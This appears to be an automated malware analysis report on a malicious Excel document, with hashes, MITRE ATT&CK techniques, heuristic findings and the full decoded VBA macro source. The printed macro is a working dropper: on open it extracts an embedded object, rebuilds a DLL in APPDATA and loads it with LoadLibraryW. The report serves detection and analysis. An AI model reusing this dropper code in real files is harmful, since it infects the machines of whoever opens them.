Office (OLE) malware analysis — malicious · a36e1d4fb57ce45d

MALICIOUS

Office (OLE)

267.5 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2019-11-20

MD5: 40912de348424ecc37c16d73ea39c326 SHA-1: 32d6b0c6224ddaab59add2c3ecf75537565ea50f SHA-256: a36e1d4fb57ce45d1acc37c6fbb782239f46e64af27cbedcf533aa3c8dc9f4de

356 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample is an Excel document containing a Workbook_Open VBA macro that triggers the execution of an embedded PE executable. The macro also utilizes ExecuteExcel4Macro and references LoadLibrary and VirtualAlloc APIs, indicating it's designed to load and run the embedded malicious binary. The presence of an embedded executable and auto-execution macro strongly suggests a downloader or dropper functionality.

Heuristics 10

ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6849 bytes
SHA-256: `4dbc703db97734b4e00edaee6cdc8d24ee25787cb2c2906b8c1d047fbfa2b0c0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wbO" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" UserForm2.TextBox1.Tag = Environ("TEMP") UserForm2.TextBox2.Tag = Environ("APPDATA") ChDir (Environ("TEMP")) UserForm1.show ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If Win64 Then Public Declare PtrSafe Function Hadno Lib _ "map_studio2.dll" () As Integer Public Declare PtrSafe Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long #Else Public Declare Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long Public Declare Function Hadno Lib _ "map_studio1.dll" () As Integer #End If Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{9688D726-F8F3-42E5-95DB-41DDA01F5774}{9097DCB3-25ED-4B5D-B203-7BED2B68D464}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() DoEvents ReplaceCurrentModule End Sub Private Sub UserForm_Initialize() Call SystemButtonSettings(Me, False) End Sub Attribute VB_Name = "Module2" Private Const GWL_STYLE = -16 Private Const WS_CAPTION = &HC00000 Private Const WS_SYSMENU = &H80000 #If VBA7 Then Private Declare PtrSafe Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long) As Long Private Declare PtrSafe Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare PtrSafe Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #Else Private Declare Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long) As Long Private Declare Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #End If Public Sub SystemButtonSettings(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FindWindowA(vbNullString, frm.Caption) windowStyle = GetWindowLong(windowHandle, GWL_STYLE) If show = False Then SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) Else SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub KillArray(ParamArray PathList() As Variant) On Error Resume Next For Each Key In PathList Kill Key Next Key On Error GoTo 0 End Sub Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer) Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte Dim DataArray() As Long ReDim DataArray(1 To fl) DataArray(1) = CByte(50 + 27) DataArray(2) = CByte(50 + 40) DataArray(3) = CByte(50 + 94) intFileNum = FreeFile Open s For Binary Access Read As intFileNum Dim cur As Integer cur = 1 Do While Not EOF(intFileNum) Get intFileNum, , bytTemp1 If bytTemp1 = DataArray(1) Then Get intFileNum, , bytTemp2 If bytTemp2 = DataArray(2) Then Get intFileNum, , bytTemp3 If bytTemp3 = DataArray(3) Then If cur = num Then For k = 4 To fl Get intFileNum, , bytTemp1 DataArray(k) = bytTemp1 Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close intFileNum intFileNum = FreeFile Open nm For Binary Lock Read Write As #intFileNum For i = LBound(DataArray) To UBound(DataArray) Put #intFileNum, , CByte(DataArray(i)) Next i Close #intFileNum End Sub Attribute VB_Name = "Module3" Public Sub ReplaceCurrentModule() TempName = UserForm2.TextBox1.Tag & "\factory.xlsx" ZipName = TempName + ".zip" ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp" Dim nm As String Dim size As Long Dim num As Integer #If Win64 Then nm = UserForm2.TextBox2.Tag + "\map_studio2.dll" size = 69120 num = 2 #Else nm = UserForm2.TextBox2.Tag + "\map_studio1.dll" size = 81920 num = 1 #End If KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False ActiveWorkbook.SaveAs TempName, FileFormat:=51 DoEvents ActiveWorkbook.Close DoEvents FileCopy TempName, ZipName Set oApp = CreateObject("Shell.Application") oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin") Resoration ZipFolder + "\oleObject1.bin", nm, size, num ChDir (UserForm2.TextBox2.Tag) No_Hadno = Hadno2(nm) Hadno End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{EF8EF5EC-9004-4B39-A6DB-0760F1F6EB90}{9EAC1FBD-72FE-4D2B-A066-0B666908883E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`embedded_office_000032db.exe`	embedded-pe	Office MZ+PE at offset 0x32DB	260901 bytes
SHA-256: `89d20383f7968cf97930685f6d5946e853f9fa119d268e7e735485a2da339b71`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD00C8E2C3/Ole10Native	160261 bytes
SHA-256: `83cb4f7518bc0bffa0c0a2a3fc4b58b72f6d598e4983080501f86cf4fa924057`

Open this report in the interactive analyzer, or submit your own file for analysis.